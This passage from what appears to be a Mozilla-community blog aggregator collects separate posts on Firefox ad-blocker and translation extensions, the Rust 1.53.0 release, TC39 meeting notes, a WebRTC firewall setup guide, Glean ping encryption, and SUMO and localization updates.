Also know, however, that ad blockers can occasionally break web pages when innocent content gets caught in the ad blocking crossfire. Some websites will even detect ad blockers and restrict access until you disable the blocker.

uBlock Origin

By any measure uBlock Origin is one of the gold standards in ad blocking. Not only an elite ad blocker that stops nearly every type of ad by default—including video and pop-ups—uBlock Origin is lightweight, so it doesn’t consume much CPU and memory. 

Not much setup required. Works brilliantly out of the box with a matrix of built-in filters (though you can import your own), including a few that block more than just ads but hidden malware sources, as well. Clicking its toolbar icon activates the extension’s minimalist pop-up menu where at a glance you can see blocked tracking sources and how much of the overall page was nearly impacted by advertising. 

Unlike some ad blockers that allow what they consider “non-intrusive” ads through their filters, uBlock Origin has no advertising whitelist by default and tries to block all ads, unless you tell it otherwise.

AdBlock for Firefox

Refined extension design and strong content filters make AdBlock for Firefox a solid choice for people who don’t necessarily despise all ads (just the super annoying, invasive kind) and perhaps recognize that advertising, however imperfect it may be, provides essential compensation for your favorite content creators and platforms. 

AdBlock blocks all types of ads by default, but lets users opt in to Acceptable Ads by choice. Acceptable Ads is an independent vetting program where advertisers can participate to have their ads pass through content filters if they meet certain criteria, like only allowing display ads that fit within strict size parameters, or text ads that adhere to tight aesthetic restrictions. 

AdBlock also makes it easy for you to elect to accept certain niche types of advertising, like ads that don’t use third party tracking, or ads on your favorite YouTube and Twitch channels. 

<figcaption>AdBlock makes it easy to allow ads on your favorite YouTube and Twitch channels.</figcaption>

AdBlock’s free tier works great, but indeed some of our favorite features—like device syncing and the ability to replace ads with custom pics of adorable animals!—sit behind a paid service.

I want ad blocking with a privacy boost.  

Arguably all ad blockers enhance your privacy and security, simply by virtue of the fact they block ads that have tracking tools embedded into them. Or even scarier than secretive corporate tracking is malvertising—ads maliciously infected with malware unbeknownst to even the advertising companies themselves, until it’s too late

So while all good ad blockers are privacy protective by nature, here are some that take additional steps…

AdGuard AdBlocker

Highly effective ad blocker and anti-tracker that even works well on Facebook and YouTube. AdGuard also smartly allows certain types of ads by default—like search ads (since you might be looking for a specific product or service) and “self promotion” ads (e.g. special deals on site-specific shopping platforms like “50% off today only!” sales, etc.)

AdGuard goes to great lengths to not only block the ads you don’t want, but the trackers trying to profile you. It automatically knows to block more than two million malicious websites and has one of the largest tracking filters in the game. 

Sick of social media ‘Like’ and ‘Share’ buttons crowding your page? Enable AdGuard’s social media filter and all social widgets are scrubbed away.

Ghostery

Block ads and hidden browser trackers by default. Ad blocking is but a part of Ghostery’s utility. 

Ghostery is quite powerful as a “privacy ad blocker,” but it also scores big points for being user-friendly and easy to operate. It’s simple to set Ghostery’s various core features, like enabling/disabling Enhanced Ad Blocking and Anti-Tracking. 

Blocking ads isn’t enough. I want a blocker that fights back! 

AdNauseum

Advertisers love knowing which ads you actually click. The ads you choose to actively engage with gives advertisers the clearest signals about what you want and how to market to you. 

AdNauseum throws a wrench in those plans by silently clicking every single ad the extension blocks. So not only does AdNauseum remove annoying ads, it overwhelms tracking companies with so much info on you—since you’re apparently interested in everything!—it’s impossible to build an effective profile on you. Hah.

More than just a means of hitting back at ad tech, AdNauseum is a highly capable content blocker built atop the strong foundation of uBlock Origin’s open-source code. It also features additional tracking protection and anti-malware features. 

<figcaption> AdNauseum’s advault interface offers a visual overview of its handy work behind the scenes. </figcaption>

YouTube ads are out of control.

AdBlocker for YouTube

If you don’t want to bother with any ad blocking other than YouTube, AdBlocker for YouTube is the choice. 

It very simply and effectively removes both video and display ads from YouTube. Period. Enjoy a faster and more focused YouTube experience. 

I want pop-up ads to go away forever. 

Popup Blocker (strict)

This lightweight extension simply stops pop-ups from deploying. Popup Blocker (strict) conveniently holds them for you in the background—giving you the choice to interact with them if you want. 

You’ll see a notification alert when pop-ups are blocked. Just click the notification for options. 

My webmail is bloated with ads.

Webmail Ad Blocker

Tired of ads thrown in your face when all you want to do is check email? 

Remove ads and get more breathing room in and around your inbox. Webmail Ad Blocker not only blocks all the box ads crowding the edges of your webmail, it also obliterates those sneaky ads that appear as unread messages. Ugh, gross. 

These are some of our favorite ad blockers. Feel free to explore more privacy & security extensions on addons.mozilla.org.

The Rust Programming Language BlogAnnouncing Rust 1.53.0

The Rust team is happy to announce a new version of Rust, 1.53.0. Rust is a programming language that is empowering everyone to build reliable and efficient software.

If you have a previous version of Rust installed via rustup, getting Rust 1.53.0 is as easy as:

rustup update stable

If you don't have it already, you can get rustup from the appropriate page on our website, and check out the detailed release notes for 1.53.0 on GitHub.

What's in 1.53.0 stable

This release contains several new language features and many new library features, including the long-awaited IntoIterator implementation for arrays. See the detailed release notes to learn about other changes not covered by this post.

IntoIterator for arrays

This is the first Rust release in which arrays implement the IntoIterator trait. This means you can now iterate over arrays by value:

for i in [1, 2, 3] {
    ..
}

Previously, this was only possible by reference, using &[1, 2, 3] or [1, 2, 3].iter().

Similarly, you can now pass arrays to methods expecting a T: IntoIterator:

let set = BTreeSet::from_iter([1, 2, 3]);
for (a, b) in some_iterator.chain([1]).zip([1, 2, 3]) {
    ..
}

This was not implemented before, due to backwards compatibility problems. Because IntoIterator was already implemented for references to arrays, array.into_iter() already compiled in earlier versions, resolving to (&array).into_iter().

As of this release, arrays implement IntoIterator with a small workaround to avoid breaking code. The compiler will continue to resolve array.into_iter() to (&array).into_iter(), as if the trait implementation does not exist. This only applies to the .into_iter() method call syntax, and does not affect any other syntax such as for e in [1, 2, 3], iter.zip([1, 2, 3]) or IntoIterator::into_iter([1, 2, 3]), which all compile fine.

Since this special case for .into_iter() is only required to avoid breaking existing code, it is removed in the new edition, Rust 2021, which will be released later this year. See the edition announcement for more information.

Or patterns

Pattern syntax has been extended to support | nested anywhere in the pattern. This enables you to write Some(1 | 2) instead of Some(1) | Some(2).

match result {
     Ok(Some(1 | 2)) => { .. }
     Err(MyError { kind: FileNotFound | PermissionDenied, .. }) => { .. }
     _ => { .. }
}

Unicode identifiers

Identifiers can now contain non-ascii characters. All valid identifier characters in Unicode as defined in UAX #31 can now be used. That includes characters from many different scripts and languages, but does not include emoji.

For example:

const BLÅHAJ: &str = "🦈";

struct 人 {
    名字: String,
}

let α = 1;

The compiler will warn about potentially confusing situations involving different scripts. For example, using identifiers that look very similar will result in a warning.

warning: identifier pair considered confusable between `s` and `s`

HEAD branch name support in Cargo

Cargo no longer assumes the default HEAD of git repositories is named master. This means you no longer need to specify branch = "main" for git dependencies from a repository where the default branch is called main.

Incremental Compilation remains off by default

As previously discussed on the blog post for version 1.52.1, incremental compilation has been turned off by default on the stable Rust release channel. The feature remains available on the beta and nightly release channels. For the 1.53.0 stable release, the method for reenabling incremental is unchanged from 1.52.1.

Stabilized APIs

The following methods and trait implementations were stabilized.

Other changes

There are other changes in the Rust 1.53.0 release: check out what changed in Rust, Cargo, and Clippy.

Contributors to 1.53.0

Many people came together to create Rust 1.53.0. We couldn't have done it without all of you. Thanks!

Firefox Add-on ReviewsTranslate the web easily with a browser extension

Do you do a lot of language translating on the web? Are you constantly copying text from one browser tab and navigating to another to paste it? Maybe you like to compare translations from different services like Google Translate or Bing Translate? Need easy access to text-to-speech features? 

Online translation services provide a hugely valuable function, but for those of us who do a lot of translating on the web, the process is time-consuming and cumbersome. With the right browser extension, however, web translations become a whole lot easier and faster. Here are some fantastic translation extensions for folks with differing needs…

I just want a simple, efficient way to translate. I don’t need fancy features.

Simple Translate

It doesn’t get much simpler than this. Highlight the text you want to translate and click the extension’s toolbar icon to activate a streamlined pop-up. Your highlighted text automatically appears in the pop-up’s translation field and a drop-down menu lets you easily select your target language. Simple Translate also features a handy “Translate this page” button should you want that. 

Translate Web Pages

Maybe you just need to translate full web pages, like reading news articles in other languages, how-to guides, or job related sites. If so, Translate Web Pages could be the ideal solution for you with its sharp focus on full-page utility. 

However the extension also benefits from a few intriguing additional features, like the ability to select up to three top languages you most commonly translate into (each one easily accessible with a single click in the pop-up menu), designate specific sites to always translate for you upon arrival, and your choice of three translation engines: Google, Yandex, and DeepL. 

To Google Translate

Very popular, very simple translation extension that exclusively uses Google’s translation services, including text-to-speech. 

Simply highlight any text on a web page and right-click to pull up a To Google Translate context menu that allows three actions: 1) translate into your preferred language; 2) listen to audio of the text; 3) Translate the entire page

<figcaption>Right-click any highlighted text to activate To Google Translate.</figcaption>

I do a ton of translating. I need power features to save me time and trouble.

ImTranslator

Striking a balance between out-of-the-box ease and deep customization potential, ImTranslator leverages three top translation engines (Google, Bing, Translator) to cover 100+ languages; the extension itself is even available in nearly two-dozen languages. 

Other strong features include text-to-speech, dictionary and spell check in eight languages, hotkey customization, and a huge array of ways to tweak the look of ImTranslator’s interface—from light and dark themes to font size and more. 

Mate Translate

A slick, intuitive extension that performs all the basic translation functions very well, but it’s Mate Translate’s paid tier that unlocks some unique features, such as Sync (saved translations can appear across devices and browsers, including iPhones and Mac). 

There’s also a neat Phrasebook feature, which lets you build custom word and phrase lists so you can return to common translations you frequently need. It works offline, too, so it’s ideal for travellers who need quick reference to common foreign phrases. 

These are some of our favorites, but there are plenty more translation extensions to explore on addons.mozilla.org.

Mozilla Privacy BlogMozilla joins call for fifth FCC Commissioner appointment

In a letter sent to the White House on Friday, June 11, 2021, Mozilla joined over 50 advocacy groups and unions asking President Biden and Vice President Harris to appoint the fifth FCC Commissioner. Without a full team of appointed Commissioners, the Federal Communications Commission (FCC) is limited in its ability to move forward on crucial tech agenda items such as net neutrality and on addressing the country’s digital divide.

“Net neutrality preserves the environment that creates room for new businesses and new ideas to emerge and flourish, and where internet users can choose freely the companies, products, and services that they want to interact with and use. In a marketplace where consumers frequently do not have access to more than one internet service provider (ISP), these rules ensure that data is treated equally across the network by gatekeepers. We are committed to restoring the protections people deserve and will continue to fight for net neutrality,” said Amy Keating, Mozilla’s Chief Legal Officer.

In March 2021, we sent a joint letter to the FCC asking for the Commission to reinstate net neutrality as soon as it is in working order. Mozilla has been one of the leading voices in the fight for net neutrality for almost a decade, together with other advocacy groups. Mozilla has defended user access to the internet, in the US and around the world. Our work to preserve net neutrality has been a critical part of that effort, including our lawsuit against the FCC to keep these protections in place for users in the US.

The post Mozilla joins call for fifth FCC Commissioner appointment appeared first on Open Policy & Advocacy.

Spidermonkey Development BlogTC39 meeting, May 25-26 2021

Due to the recent changes on freenode, TC39 has moved to Matrix as its communication platform of choice. Read more here.

The TC39 meeting in May, one of the shorter two day meetings of the committee, primarily focused on more mature proposals, and no stage 1 proposals were introduced. Object.hasOwn moved forward quickly, reaching stage 3 at this meeting. In addition, Top-level await and RegExp Match Indices both moved to stage 4. Resizeable ArrayBuffers and Growable SharedArrayBuffers advanced to stage 3, and implementation will soon start in major browsers. This proposal introduces growable and shrinkable memory which will have implications for web developers as well as other specifications such as WebGPU and WebAssembly.

Realms, which is finally in a shape that browsers would be willing to implemented, was held back from stage 3 due to ergonomic concerns for certain use cases.

Keep an eye on…

  • Realms

Normative Spec Changes

None.

Proposals Seeking Advancement to Stage 4

RegExp Match Indices

  • Notes
  • Proposal
  • PR
  • Spec
  • Slides
  • Summary: RegExp Match indices allow retrieving the index of a given match. This is useful for applications such as text editors. You can now use it with the d flag, for example: /hello/d.
  • Impact on SM: Already Shipping,
  • Outcome: Advanced to stage 4.

Top Level Await

  • Notes
  • Proposal
  • PR
  • Slides
  • Summary: Top level await treats modules as large async functions and allows developers to use the await keyword at the top level of the module. This simplifies the modules which require immmediate async work.
  • Impact on SM: Already Shipping,
  • Outcome: Advanced to stage 4.

Proposals Seeking Advancement to Stage 3

Symbols as WeakMap Keys

  • Notes, More notes
  • Proposal
  • Slides
  • Summary: Symbols as Weakmap Keys proposal would allow users to use symbols in WeakMaps. This is currently forbidden, because certain symbols are never garbage collected and are similar to using a primitive value such as an integer in a Weakmap key. However, this only applies to things like registered symbols. The contention around this proposal is if the two types of symbols should be treated differently. This was not resolved in this meeting.
  • Impact on SM: Will need implementation
  • Outcome: Did not advance to stage 3.

ResizableArrayBuffer for Stage 3

  • Notes
  • Proposal Link
  • Slides
  • Summary: Introduces two new ArrayBuffers, one resizable, the other only growable (and shared).
  • Impact on SM: Will need implementation
  • Outcome: Advanced to stage 3.

Intl DisplayNames v2 for Stage 3

  • Notes
  • Proposal Link
  • Slides
  • Summary: Adds further coverage to the existing Intl.DisplayNames API. Was initially blocked from advancement while Issue #29 was sorted out.
  • Impact on SM: Will need implementation
  • Outcome: Advanced to stage 3.

Object.hasOwn for Stage 3

  • Notes
  • Proposal Link
  • Slides
  • Summary: Checking an object for a property at the moment, is rather unintuitive and error prone. This proposal introduces a more ergonoic wrapper around a common pattern involving Object.prototype.hasOwnProperty which allows the following:
      let hasOwnProperty = Object.prototype.hasOwnProperty
    
      if (hasOwnProperty.call(object, "foo")) {
        console.log("has property foo")
      }
    

    to be written as:

      if (Object.hasOwn(object, "foo")) {
        console.log("has property foo")
      }
    
  • Impact on SM: Implemented
  • Outcome: Advanced to stage 3.

Realms for stage 3

  • Notes
  • Proposal Link
  • Slides
  • Summary: Realms exposes a new global without a document for use by JS programmers, think iframes without the document. This new proposal api is “isolated realms” which does not allow passing bare object specifiers between realms. This is an improvement from the browser architecture perspective, but it is less ergonomic. This issue was called out in the meeting, and the proposal did not advance as a result.
  • Impact on SM: No change
  • Outcome: Did not advance to stage 3.

Extend TimeZoneName Option Proposal for Stage 3

  • Notes
  • Proposal Link
  • Slides
  • Summary: Adds further options for the TimeZoneName option in Intl.DateTimeFormat, allowing for greater accuracy in representing different time zones.
  • Impact on SM: Implemented
  • Outcome: Advanced to stage 3.

Stage 3 Updates

Temporal update

  • Notes
  • Proposal Link
  • Slides
  • Summary: Introduces a new date/time library. If you would like to try it ahead of time, they have created a cookbook and polyfill for experimentation. During implementation in SpiderMonkey, a few issues were discovered in the spec. This update covers fixes to those issues.
  • Impact on SM: Implementation in Progress. Must not ship unflagged until IETF standardizes timezone/calendar string serialization formats

Proposals Seeking Advancement to Stage 2

Adopting Unicode behavior for set notation in regular expressions

  • Notes
  • Proposal Link
  • Slides
  • Summary: Add syntax & semantics for the following set operations: difference/subtraction (in A but not in B), intersection (in both A and B), nested character classes (needed to enable the above)
  • Impact on SM: Will need implementation.
  • Outcome: Advanced to stage 2.

Stage 2 Updates

Intl Enumeration API update

  • Notes
  • Proposal Link
  • Slides
  • Summary: Intl enumeration allows inspecting what is available on the Intl API. Initially, we had reservations that this could be used for fingerprinting. Mozilla did an analysis and no longer holds this concern. However, it is unclear if this api has usecases which warrant its inclusion in the language.
  • Impact on SM: Will Need implementation

Niko MatsakisCTCFT 2021-06-21 Agenda

The second “Cross Team Collaboration Fun Times” (CTCFT) meeting will take place one week from today, on 2021-06-21 (in your time zone)! This post describes the main agenda items for the meeting; you’ll find the full details (along with a calendar event, zoom details, etc) on the CTCFT website.

Afterwards: Social hour

After the CTCFT this week, we are going to try an experimental social hour. The hour will be coordinated in the #ctcft stream of the rust-lang Zulip. The idea is to create breakout rooms where people can gather to talk, hack together, or just chill.

Turbowish and Tokio console

Presented by: pnkfelix and Eliza (hawkw)

Rust programs are known for being performant and correct – but what about when that’s not true? Unfortunately, the state of the art for Rust tooling today can often be a bit difficult. This is particularly true for Async Rust, where users need insights into the state of the async runtime so that they can resolve deadlocks and tune performance. This talk discuss what top-notch debugging and tooling for Rust might look like. One particularly exciting project in this area is tokio-console, which lets users visualize the state of projects build on the tokio library.

Guiding principles for Rust

Presented by: nikomatsakis

As Rust grows, we need to ensure that it retains a coherent design. Establishing a set of “guiding principles” is one mechanism for doing that. Each principle captures a goal that Rust aims to achieve, such as ensuring correctness, or efficiency. The principles give us a shared vocabulary to use when discussing designs, and they are ordered so as to give guidance in resolving tradeoffs. This talk will walk through a draft set of guiding principles for Rust that nikomatsakis has been working on, along with examples of how they those principles are enacted through Rust’s language, library, and tooling.

François MarierHow to get a direct WebRTC connections between two computers

WebRTC is a standard real-time communication protocol built directly into modern web browsers. It enables the creation of video conferencing services which do not require participants to download additional software. Many services make use of it and it almost always works out of the box.

The reason it just works is that it uses a protocol called ICE to establish a connection regardless of the network environment. What that means however is that in some cases, your video/audio connection will need to be relayed (using end-to-end encryption) to the other person via third-party TURN server. In addition to adding extra network latency to your call that relay server might overloaded at some point and drop or delay packets coming through.

Here's how to tell whether or not your WebRTC calls are being relayed, and how to ensure you get a direct connection to the other host.

Testing basic WebRTC functionality

Before you place a real call, I suggest using the official test page which will test your camera, microphone and network connectivity.

Note that this test page makes use of a Google TURN server which is locked to particular HTTP referrers and so you'll need to disable privacy features that might interfere with this:

  • Brave: Disable Shields entirely for that page (Simple view) or allow all cookies for that page (Advanced view).

  • Firefox: Ensure that http.network.referer.spoofSource is set to false in about:config, which it is by default.

  • uMatrix: The "Spoof Referer header" option needs to be turned off for that site.

Checking the type of peer connection you have

Once you know that WebRTC is working in your browser, it's time to establish a connection and look at the network configuration that the two peers agreed on.

My favorite service at the moment is Whereby (formerly Appear.in), so I'm going to use that to connect from two different computers:

  • canada is a laptop behind a regular home router without any port forwarding.
  • siberia is a desktop computer in a remote location that is also behind a home router, but in this case its internal IP address (192.168.1.2) is set as the DMZ host.

Chromium

For all Chromium-based browsers, such as Brave, Chrome, Edge, Opera and Vivaldi, the debugging page you'll need to open is called chrome://webrtc-internals.

Look for RTCIceCandidatePair lines and expand them one at a time until you find the one which says:

  • state: succeeded (or state: in-progress)
  • nominated: true
  • writable: true

Then from the name of that pair (N6cxxnrr_OEpeash in the above example) find the two matching RTCIceCandidate lines (one local-candidate and one remote-candidate) and expand them.

In the case of a direct connection, I saw the following on the remote-candidate:

  • ip shows the external IP address of siberia
  • port shows a random number between 1024 and 65535
  • candidateType: srflx

and the following on local-candidate:

  • ip shows the external IP address of canada
  • port shows a random number between 1024 and 65535
  • candidateType: prflx

These candidate types indicate that a STUN server was used to determine the public-facing IP address and port for each computer, but the actual connection between the peers is direct.

On the other hand, for a relayed/proxied connection, I saw the following on the remote-candidate side:

  • ip shows an IP address belonging to the TURN server
  • candidateType: relay

and the same information as before on the local-candidate.

Firefox

If you are using Firefox, the debugging page you want to look at is about:webrtc.

Expand the top entry under "Session Statistics" and look for the line (should be the first one) which says the following in green:

  • ICE State: succeeded
  • Nominated: true
  • Selected: true

then look in the "Local Candidate" and "Remote Candidate" sections to find the candidate type in brackets.

Firewall ports to open to avoid using a relay

In order to get a direct connection to the other WebRTC peer, one of the two computers (in my case, siberia) needs to open all inbound UDP ports since there doesn't appear to be a way to restrict Chromium or Firefox to a smaller port range for incoming WebRTC connections.

This isn't great and so I decided to tighten that up in two ways by:

  • restricting incoming UDP traffic to the IP range of siberia's ISP, and
  • explicitly denying incoming to the UDP ports I know are open on siberia.

To get the IP range, start with the external IP address of the machine (I'll use the IP address of my blog in this example: 66.228.46.55) and pass it to the whois command:

$ whois 66.228.46.55 | grep CIDR
CIDR:           66.228.32.0/19

To get the list of open UDP ports on siberia, I sshed into it and ran nmap:

$ sudo nmap -sU localhost

Starting Nmap 7.60 ( https://nmap.org ) at 2020-03-28 15:55 PDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000015s latency).
Not shown: 994 closed ports
PORT      STATE         SERVICE
631/udp   open|filtered ipp
5060/udp  open|filtered sip
5353/udp  open          zeroconf

Nmap done: 1 IP address (1 host up) scanned in 190.25 seconds

I ended up with the following in my /etc/network/iptables.up.rules (ports below 1024 are denied by the default rule and don't need to be included here):

# Deny all known-open high UDP ports before enabling WebRTC for canada
-A INPUT -p udp --dport 5060 -j DROP
-A INPUT -p udp --dport 5353 -j DROP
-A INPUT -s 66.228.32.0/19 -p udp --dport 1024:65535 -j ACCEPT

Patrick ClokeConverting Twisted’s inlineCallbacks to async

Almost a year ago we had a push at Element to convert the remaining instances of Twisted’s inlineCallbacks to use native async/await syntax from Python [1]. Eventually this work got covered by issue #7988 (which is the original basis for this blogpost).

Note that Twisted itself gained some …

Data@Mozilla⚠️Danger zone⚠️: handling sensitive data in Glean

Co-authored by Alessio Placitelli and Beatriz Rizental.
(“This Week in Glean” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean. You can find an index of all TWiG posts online.)

🎵 “Precious and fragile things, need special handling […]” 🎵, and that applies to data, too!

Over the years, a number of projects at Mozilla had to handle the collection of sensitive data users explicitly decided to share with us (think, just as an example, things as sensitive as full URLs). Most of the time projects were designed and built over our legacy telemetry systems, leaving developers with the daunting task of validating their implementations, asking for security reviews and re-inventing their APIs.

With the advent of Glean, Mozilla’s Data Org took the opportunity to improve this area, allowing our internal customers to build better data products.

Fresh Prince saying: Wait a Minute..?

 

Data collection + Pipeline Encryption = ✨

We didn’t really talk about what we mean by “special handling”, did we?

For data that is generally not sensitive (e.g. the amount of available RAM), after a product using Glean submits a ping, it hits the ingestion pipeline. The communication channel between the Glean client and the ingestion server is HTTPS, which means the channel is encrypted from one end (the client) to the other end (the ingestion server). After the ingestion server is hit, unencrypted pings are routed within our ingestion pipeline and dispatched to the destination tables.

For products requesting pipeline encryption to make sure only specific individuals and pipeline engineers can access the data, the path is slightly different. When enabling them in the ingestion pipeline, an encryption key is provisioned and must be configured in the product using Glean before new pings can be successfully ingested into a data store. From that moment on, all the pings generated by the Glean client will look like this:

{
"payload": "eyJhbGciOiJFQ0RILUVTI..."
}

Not a lot of info to route things within the pipeline, right? 🤦

Luckily for our pipeline, all Glean ping submissions conform to the HTTP Edge Specification. By knowing the Glean application id (which maps to the document namespace from the HTTP Edge Specification) and the ping type, the pipeline knows everything it needs to route pings to their destination, look up the decryption keys and decrypt the payload before inserting it into the destination table.

It’s important to note that only a handful of pipeline engineers are authorized to inspect the encrypted payload (and enabled to fix things if they break!) and only an explicit list of individuals, created when enabling the product in the pipeline, is allowed to access the final data within a secure, locked down environment.

How does the ✨magic✨ happen in the Glean SDKs?

As discussed, ping encryption is not a feature required by all products using Glean. From a client standpoint, it is also a feature that has the potential to significantly increase the size of the final Glean SDK because, in most environments, external dependencies are necessary to encrypt the ping payload. Ideally, we should find a way to make it an opt-in feature i.e. only users that actually need it pay the (size) price for it. And so we did.

Ping encryption was the perfect use case to implement a new and long discussed feature in the Glean SDKs: plugins. By implementing the ping encryption as a plugin and not a core feature, we achieve the goal of making it an opt-in feature. This strategy also has the added bonus of keeping the encryption initialization parameters out of the Glean configuration object, win/win.

Since the ping encryption plugin would be the first ever Glean SDK plugin, we needed to figure out our plugin architecture. In a nutshell, the concept we settled for is: plugins are classes that define an action to be performed when a specific Glean event happens. Each event might provide extra context for the action performed by the plugin and might require that the plugin return a modified version of said context. Plugin instances are passed to Glean as initialization parameters.

Let’s put a shape to this, by describing the ping encryption plugin.

  • The ping encryption plugin is registered to the afterPingCollection event.
    •  This event will call a plugin action after the ping is collected, but before it is stored and queued for upload. This event will also provide the collected ping payload as context to the plugin action and requires that the action return a JSON object. Whatever the action returns is what will be saved and queued for upload in place of the original payload. If no plugin is registered to this event, collection happens as usual.
  • The ping encryption plugin action, gets the ping payload from this event and returns the encrypted version of this payload.

In order to use this plugin, products using Glean need to pass an instance of it to the Glean SDK of their choice during initialization.

import Glean from "@mozilla/glean/webext"
import PingEncryptionPlugin from "@mozilla/glean/plugins/encryption"
Glean.initialize(
  "my.fancy.encrypted.app",
  uploadStatus,
  {
    plugins: [
      new PingEncryptionPlugin({
        "crv": "P-256",
        "kid": "fancy",
        "kty": "EC",
        "x": "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx",
        "y": "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
      })
    ]
  }
);

And that is it. All pings sent from this Glean instance will now be encrypted before they are sent.

Harry Potter loves magic

Note: The ping encryption plugin is only available on the Glean JavaScript SDK at the moment. Please refer to the Glean book for comprehensive documentation on using the PingEncryptionPlugin.

Limitations and next steps

Futurama Welcome to the world of tomorrow!

While the current approach serves the needs of Mozilla’s internal customers, there are some limitations that we are planning to smooth out in the future. For example, in order to be properly routed, products that want to opt-into Glean pipeline encryption will need to use a fixed, common prefix in their application id. Another constraint of the current system is that once a product opts into Pipeline encryption, all the pings are expected to be encrypted: the same product won’t be able to send both pipeline-encrypted and pipeline-unencrypted pings.

One final constraint is that the tooling available in the secure environment is limited to Jupyter notebooks.

Acknowledgements

The pipeline encryption support in Glean wasn’t built in a day! This major feature is based on the incremental work that happened over the past year, of many Mozillians (thank you Wesley Dawson, Anthony Miyaguchi, Arkadiusz Komarzewski and anyone else who helped with it!).

And kudos to the first product making use of this neat feature!

Support.Mozilla.OrgWhat’s up with SUMO – June 2021

Hey SUMO folks,

Welcome to the month of June 2021. A new mark for Firefox with the release of Firefox 89. Lots of excitement and anticipation for the changes.

Let’s see what we’re up to these days!

Welcome on board!

  1. Welcome and thanks to TerryN21 and Mamoon for being active in the forum.

Community news

  • June is the month of Major Release 1 (MR1) or commonly known as Proton release. We have prepared a spreadsheet to list down the changes for this release, so you can easily find the workarounds, related bugs, and common responses for each issue. You can join Firefox 89 discussion in this thread and find out about our tagging plan here.
  • If an advanced topic like pref modification in the about:config is something that you’re interested in, please join our discussion in this community thread. We talked about how we can accommodate this in a more responsible and safer way without harming our normal users.
  • What do you think of supporting Firefox users on Facebook? Join our discussion here.
  • We said goodbye to Joni last month and Madalina has also bid farewell to us in our last community call (though she’ll stay until the end of the quarter). It’s sad to let people go, but we know that changes are normal and expected. We’re grateful for what both Joni and Madalina have done in SUMO and hope the best for whatever comes next for them.
  • Another reminder to check out Firefox Daily Digest to get daily updates about Firefox. Go check it out and subscribe if you haven’t already.
  • There’s only one update from our dev team in the past month:

Community call

  • Find out what we talked about in our community call in May.
  • Reminder: Don’t hesitate to join the call in person if you can. We try our best to provide a safe space for everyone to contribute. You’re more than welcome to lurk in the call if you don’t feel comfortable turning on your video or speaking up. If you feel shy to ask questions during the meeting, feel free to add your questions on the contributor forum in advance, or put them in our Matrix channel, so we can address them during the meeting.

Community stats

KB

KB Page views

Month Page views Vs previous month
May 2021 7,601,709 -13.02%

Top 5 KB contributors in the last 90 days: 

  1. AliceWyman
  2. Jeff
  3. Michele Rodaro
  4. Underpass
  5. Marchelo Ghelman

KB Localization

Top 10 locale based on total page views

Locale Apr 2021 page views Localization progress (per Jun, 3)
de 10.05% 99%
zh-CN 6.82% 100%
es 6.71% 42%
pt-BR 6.61% 65%
fr 6.37% 86%
ja 4.33% 53%
ru 3.54% 95%
it 2.28% 98%
pl 2.17% 84%
zh-TW 1.04% 6%

Top 5 localization contributor in the last 90 days: 

  1. Milupo
  2. Artist
  3. Markh2
  4. Soucet
  5. Goudron

Forum Support

Forum stats

Month Total questions Answer rate within 72 hrs Solved rate within 72 hrs Forum helpfulness
Jun 2021 3091 65.97% 13.62% 63.64%

Top 5 forum contributor in the last 90 days: 

  1. Cor-el
  2. FredMcD
  3. Jscher2000
  4. Seburo
  5. Databaseben

Social Support

Channel May 2021
Total conv Conv handled
@firefox 4012 212
@FirefoxSupport 367 267

Top 5 contributors in Q1 2021

  1. Christophe Villeneuve
  2. Md Monirul Alom
  3. Devin E
  4. Andrew Truong
  5. Dayana Galeano

Play Store Support

We don’t have enough data for the Play Store Support yet. However, you can check out the overall Respond Tool metrics here.

Product updates

Firefox desktop

  • Fx 89 / MR1 released (June 1)
    • BIG THANKS – to all the contributors who helped with article revisions, localization, and for the help with ongoing MR1 Rapid Feedback Collection reporting
  • Fx 90 (July 13)
    • Background update Agents
    • SmartBlock UI improvements
    • About:third-party addition

Firefox mobile

  • Fx for Android 89 (June 1)
    • Improved menus
    • Redesigned Top Sites
    • Easier access to Synced Tabs
  • Fx for iOS V34 (June 1)
    • Updated Look
    • Search enhancements
    • Tab improvements
  • Fx for Android 90 (July 13th)
    • CC autocomplete

Other products / Experiments

  • Sunset of Firefox lite (June 1)
    • Effective June 30, this app will no longer receive security or other updates. Get the official Firefox Android app now for a fast, private & safe web browser
  • Mozilla VPN V2.3 (June 8)
    • Captive Portal Alerts
  • Mozilla VPN V2.4 (July 14)
    • Split tunneling for Windows
    • Local DNS: user settings for local dns server

Shout-outs!

  • Thanks to Danny Colin and Monirul Alom for helping with the MR1 feedback collection project! 🙌

If you know anyone that we should feature here, please contact Kiki, and we’ll make sure to add them in our next edition.

Useful links:

Mozilla Localization (L10N)L10n Report: June 2021 Edition

Please note some of the information provided in this report may be subject to change as we are sometimes sharing information about projects that are still in early stages and are not final yet. 

Welcome!

Are you a locale leader and want us to include new members in our upcoming reports? Contact us!

New content and projects

Firefox 89 (MR1)

On June 1st, Mozilla released Firefox 89. That was a major milestone for Firefox, and a lot of work went into this release (internally called MR1, which stands for Major Release 1). If this new update was well received — see for example this recent article from ZDNet — it’s also thanks to the amazing work done by our localization community.

For the first time in over a decade, we looked at Firefox holistically, making changes across the board to improve messages, establish a more consistent tone, and modernize some dialogs. This inevitably generated a lot of new content to localize.

Between November 2020 and May 2021, we added 1637 strings (6798 words). To get a point of reference, that’s almost 14% of the entire browser. What’s amazing is that the completion levels didn’t fall drastically:

  • Nov 30, 2020: 89.03% translated across all shipping locales, 99.24% for the top 15 locales.
  • May 24, 2021: 87.85% translated across all shipping locales, 99.39% for the top 15 locales.

The completion level across all locales is lower, but that’s mostly due to locales that are completely unmaintained, and that we’ll likely need to drop from release later this year. If we exclude those 7 locales, overall completion increased by 0.10% (to 89.84%).

Once again, thanks to all the volunteers who contributed to this successful release of Firefox.

What’s new or coming up in Firefox desktop

These are the important deadlines for Firefox 90, currently in Beta:

  • Firefox 90 will be released on July 13. It will be possible to update localizations until July 4.
  • Firefox 91 will move to beta on July 12 and will be released on August 10.

Keep in mind that Firefox 91 is also going to be the next ESR version. Once that moves to release, it won’t generally be possible to update translations for that specific version.

Talking about Firefox 91, we’re planning to add a new locale: Scots. Congratulations to the team for making it so quickly to release!

On a final note, expect to see more updates to the Firefox L10n Newsletter, since this has proved to be an important tool to provide more context to localizers, and help them with testing.
